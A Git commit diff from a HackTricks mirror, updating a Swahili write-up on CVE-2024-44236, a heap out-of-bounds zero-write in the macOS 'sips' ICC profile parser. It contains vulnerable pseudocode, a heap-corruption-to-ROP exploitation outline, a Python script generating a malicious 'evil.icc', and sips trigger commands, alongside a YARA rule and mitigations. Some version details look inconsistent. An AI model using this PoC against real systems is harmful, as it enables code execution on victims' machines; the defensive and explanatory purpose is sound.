maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips

Browse Source
This commit is contained in:
Translator 2025-07-30 04:28:02 +00:00
parent 3760ad0cdb
commit bd5930c899
1 changed files with 72 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

100
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md
View File

@ -4,50 +4,94 @@
## Overview
Ushirikiano wa kuandika nje ya mipaka katika parser ya profaili ya ICC ya Apple macOS Scriptable Image Processing System (`sips`) (macOS 15.0.1, sips-307) kutokana na uhakiki usio sahihi wa uwanja wa `offsetToCLUT` katika lebo za `lutAToBType` (`mAB `) na `lutBToAType` (`mBA `). Faili ya ICC iliyoundwa inaweza kusababisha kuandika sifuri hadi byte 16 baada ya buffer ya heap, ikiharibu metadata ya heap au viashiria vya kazi na kuwezesha utekelezaji wa msimbo wa kiholela (CVE-2024-44236).
Ukiukosefu wa **zero-write** katika Apple macOS **Scriptable Image Processing System** (`sips`) parser ya ICC profile (macOS 15.0.1, `sips-307`) unaruhusu mshambuliaji kuharibu metadata ya heap na kubadilisha primitive kuwa utekelezaji wa msimbo kamili. Kosa hili liko katika usimamizi wa uwanja wa `offsetToCLUT` wa lebo za `lutAToBType` (`mAB `) na `lutBToAType` (`mBA `). Ikiwa washambuliaji wataweka `offsetToCLUT == tagDataSize`, parser inafuta **bytes 16 baada ya mwisho wa buffer ya heap**. Heap spraying inaruhusu mshambuliaji kufuta muundo wa allocator au viashiria vya C++ ambavyo baadaye vitarejelewa, na kutoa mnyororo wa **arbitrary-write-to-exec** (CVE-2024-44236, CVSS 7.8).
> Apple ilirekebisha kosa hili katika macOS Sonoma 15.2 / Ventura 14.7.1 (Oktoba 30, 2024). Toleo la pili (CVE-2025-24185) lilirekebishwa katika macOS 15.5 na iOS/iPadOS 18.5 mnamo Aprili 1, 2025.
## Vulnerable Code
Kazi iliyo hatarini inasoma na kuweka sifuri byte 16 kuanzia kwenye offset inayodhibitiwa na mshambuliaji bila kuhakikisha inapatikana ndani ya buffer iliyotolewa:
```c
// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1)
for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) {
if (i > numberOfInputChannels && buffer[i] != 0)
buffer[i] = 0;
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
// BAD ➜ zero 16 bytes starting *at* offsetToCLUT
for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
buffer[i] = 0; // no bounds check vs allocated size!
}
```
Tuangalia tu `offsetToCLUT <= totalDataLength`. Kwa kuweka `offsetToCLUT == tagDataSize`, mzunguko unafikia hadi byte 16 baada ya mwisho wa `buffer`, ukiharibu metadata ya heap iliyo karibu.
## Hatua za Utekelezaji
1. **Tengeneza profaili mbaya ya `.icc`:**
- Jenga kichwa cha ICC (bytes 128) chenye saini `acsp` na kiingilio kimoja cha `lutAToBType` au `lutBToAType`.
- Katika jedwali la lebo, weka `offsetToCLUT` kuwa sawa na `size` ya lebo (`tagDataSize`).
- Weka data inayodhibitiwa na mshambuliaji mara moja baada ya block ya data ya lebo ili kuandika metadata ya heap.
2. **Chochea uchambuzi:**
1. **Tengeneza profaili mbaya ya `.icc`**
* Weka kichwa kidogo cha ICC (`acsp`) na ongeza lebo moja `mAB ` (au `mBA `).
* Sanidi jedwali la lebo ili **`offsetToCLUT` iwe sawa na saizi ya lebo** (`tagDataSize`).
* Weka data inayodhibitiwa na mshambuliaji mara tu baada ya lebo ili kwamba maandiko 16 ya sifuri yachanganye metadata ya allocator.
2. **Chochea uchambuzi kwa operesheni yoyote ya sips inayogusa profaili**
```bash
sips --verifyColor malicious.icc
# njia ya uthibitisho (hakuna faili la pato linalohitajika)
sips --verifyColor evil.icc
# au kwa njia isiyo ya moja kwa moja wakati wa kubadilisha picha zinazojumuisha profaili
sips -s format png payload.jpg --out out.png
```
3. **Uharibifu wa metadata ya heap:** Kuandika sifuri OOB huandika metadata ya allocator au viashiria vya karibu, ikiruhusu mshambuliaji kuchukua udhibiti wa mtiririko na kufikia utekelezaji wa msimbo wa kiholela katika muktadha wa mchakato wa `sips`.
3. **Uharibifu wa metadata ya Heap ➜ andiko la kiholela ➜ ROP**
Katika **`nano_zone` allocator** ya Apple, metadata ya nafasi za byte 16 inapatikana **moja kwa moja baada** ya slab iliyopangwa ya 0x1000. Kwa kuweka lebo ya profaili mwishoni mwa slab kama hiyo, maandiko 16 ya sifuri yanaharibu `meta->slot_B`. Baada ya `free` inayofuata, kiashiria kilichoharibiwa kinajumuishwa kwenye orodha ndogo ya bure, ikimruhusu mshambuliaji **kuweka kitu bandia kwenye anwani yoyote** na kuandika tena kiashiria cha vtable cha C++ kinachotumiwa na sips, hatimaye kuhamasisha utekelezaji kwa mnyororo wa ROP uliohifadhiwa kwenye buffer mbaya ya ICC.
## Athari
### Mzushi wa PoC wa Haraka (Python 3)
```python
#!/usr/bin/env python3
import struct, sys
Utekelezaji wa mafanikio unapelekea utekelezaji wa msimbo wa kiholela kwa mbali kwa ruhusa ya mtumiaji kwenye mifumo ya macOS inayotumia zana ya `sips` iliyo hatarini.
HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)] # one tag directly after header
profile = HDR
profile += struct.pack('>I', len(TAGS)) # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
## Ugunduzi
mab = bytearray(52) # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start)
profile += mab
- Fuata uhamishaji wa faili kwenye protokali za kawaida (FTP, HTTP/S, IMAP, SMB, NFS, SMTP).
- Kagua faili zilizohamishwa zikiwa na saini `acsp`.
- Kwa kila lebo `mAB ` au `mBA `, thibitisha ikiwa uwanja wa `Offset to CLUT` ni sawa na `Tag data size`.
- Weka alama kama ya kutatanisha ikiwa hali hii inakidhi.
open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```
### Sheria ya kugundua YARA
```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
meta:
description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
author = "HackTricks"
strings:
$magic = { 61 63 73 70 } // 'acsp'
$mab = { 6D 41 42 20 } // 'mAB '
$mba = { 6D 42 41 20 } // 'mBA '
condition:
$magic at 0 and
for any i in (0 .. 10): // up to 10 tags
(
($mab at 132 + 12*i or $mba at 132 + 12*i) and
uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
)
}
```
## Impact
## Marejeleo
Kufungua au kushughulikia profaili ya ICC iliyoundwa kunasababisha **arbitrary code execution** kwa mbali katika muktadha wa mtumiaji anayeitisha (Preview, QuickLook, Safari image rendering, Mail attachments, nk.), ikipita Gatekeeper kwa sababu profaili inaweza kuingizwa ndani ya picha zisizo na madhara (PNG/JPEG/TIFF).
- ZDI blog: CVE-2024-44236: Uthibitisho wa Utekelezaji wa Msimbo wa Mbali katika Zana ya Apple macOS sips
https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos
- Sasisho la Usalama la Apple Oktoba 2024 (patch inayopeleka CVE-2024-44236)
https://support.apple.com/en-us/121564
## Detection & Mitigation
* **Patch!** Hakikisha mwenyeji anatumia macOS ≥ 15.2 / 14.7.1 (au iOS/iPadOS ≥ 18.1).
* Tumia sheria ya YARA hapo juu kwenye lango la barua pepe na suluhisho za EDR.
* Ondoa au safisha profaili za ICC zilizojumuishwa kwa `exiftool -icc_profile= -overwrite_original <file>` kabla ya kushughulikia zaidi kwenye faili zisizoaminika.
* Imarisha Preview/QuickLook kwa kuzifanya zifanye kazi ndani ya VMs za “transparency & modernisation” zilizofungwa wakati wa kuchambua maudhui yasiyojulikana.
* Kwa DFIR, angalia utekelezaji wa hivi karibuni wa `sips --verifyColor` au upakiaji wa maktaba ya `ColorSync` na programu zilizofungwa katika kumbukumbu iliyounganishwa.
## References
* Trend Micro Zero Day Initiative advisory ZDI-24-1445 “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”
https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
* Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”
https://support.apple.com/en-us/HT213981
{{#include ../../banners/hacktricks-training.md}}